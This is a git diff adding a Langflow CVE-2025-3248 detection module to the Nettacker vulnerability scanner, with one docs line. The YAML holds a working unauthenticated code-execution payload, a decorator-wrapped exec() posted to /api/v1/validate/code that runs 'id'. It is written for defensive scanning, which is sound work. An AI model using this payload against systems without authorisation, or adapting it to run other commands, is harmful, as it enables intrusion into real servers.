diff --git a/docs/Modules.md b/docs/Modules.md
index 10cd1c6a1..449eff140 100644
--- a/docs/Modules.md
+++ b/docs/Modules.md
@@ -212,6 +212,7 @@ If you want to scan all ports please define -g 1-65535 range. Otherwise Nettacke
 - '**ivanti_ics_cve_2023_46805_vuln**' – check the target for Ivanti ICS CVE-2023-46805 vulnerability
 - '**joomla_cve_2023_23752_vuln**' – check the target for Joomla CVE-2023-23752 information disclosure
 - '**justwriting_cve_2021_41878_vuln**' – check the target for JustWriting CVE-2021-41878
+- '**langflow_cve_2025_3248_vuln**' - check the target for Langflow CVE-2025-3248 vulnerability
 - '**log4j_cve_2021_44228_vuln**' – check the target for Log4Shell CVE-2021-44228 vulnerability
 - '**maxsite_cms_cve_2021_35265_vuln**' – check the target for MaxSite CMS CVE-2021-35265
 - '**memos_cve_2025_22952_ssrf_vuln**' – check vulnerable Memos markdown metadata endpoint CVE-2025-22952
diff --git a/nettacker/modules/vuln/langflow_cve_2025_3248.yaml b/nettacker/modules/vuln/langflow_cve_2025_3248.yaml
new file mode 100644
index 000000000..387cb62fe
--- /dev/null
+++ b/nettacker/modules/vuln/langflow_cve_2025_3248.yaml
@@ -0,0 +1,61 @@
+info:
+  name: langflow_cve_2025_3248_vuln
+  author: jess-tech-lab
+  severity: 9.8
+  description: >
+    Unauthenticated Remote Code Execution (RCE) in Langflow < 1.3.0 via 
+    the /api/v1/validate/code endpoint due to unsafe use of exec(). This module
+    uses a decorator-based execution bypass to trigger code execution
+  references:
+    - https://nvd.nist.gov/vuln/detail/CVE-2025-3248
+    - https://www.cisa.gov/known-exploited-vulnerabilities-catalog
+    - https://github.com/advisories/GHSA-rvqx-wpfh-mfx7
+    - https://www.trendmicro.com/en_us/research/25/f/langflow-vulnerability-flodric-botnet.html
+  profiles:
+    - vuln
+    - http
+    - critical_severity
+    - cve
+    - cve2025
+    - langflow
+    - rce
+
+payloads:
+  - library: http
+    steps:
+      - method: post
+        timeout: 5
+        headers:
+          User-Agent: "{user_agent}"
+          Content-Type: "application/json"
+          Accept: "application/json"
+        allow_redirects: false
+        ssl: false
+        json:
+          code: |
+            @exec("import subprocess; raise Exception(subprocess.check_output(['id']))")
+            def foo(): 
+              pass
+        url:
+          nettacker_fuzzer:
+            input_format: "{{schema}}://{target}:{{ports}}/api/v1/validate/code"
+            prefix: ""
+            suffix: ""
+            interceptors:
+            data:
+              schema:
+                - "http"
+                - "https"
+              ports:
+                - 7860 # Default Langflow port
+                - 80
+                - 443
+        response:
+          condition_type: and
+          conditions:
+            status_code:
+              regex: "200"
+              reverse: false
+            content:
+              regex: "uid=[0-9]+\\(.*\\)"
+              reverse: false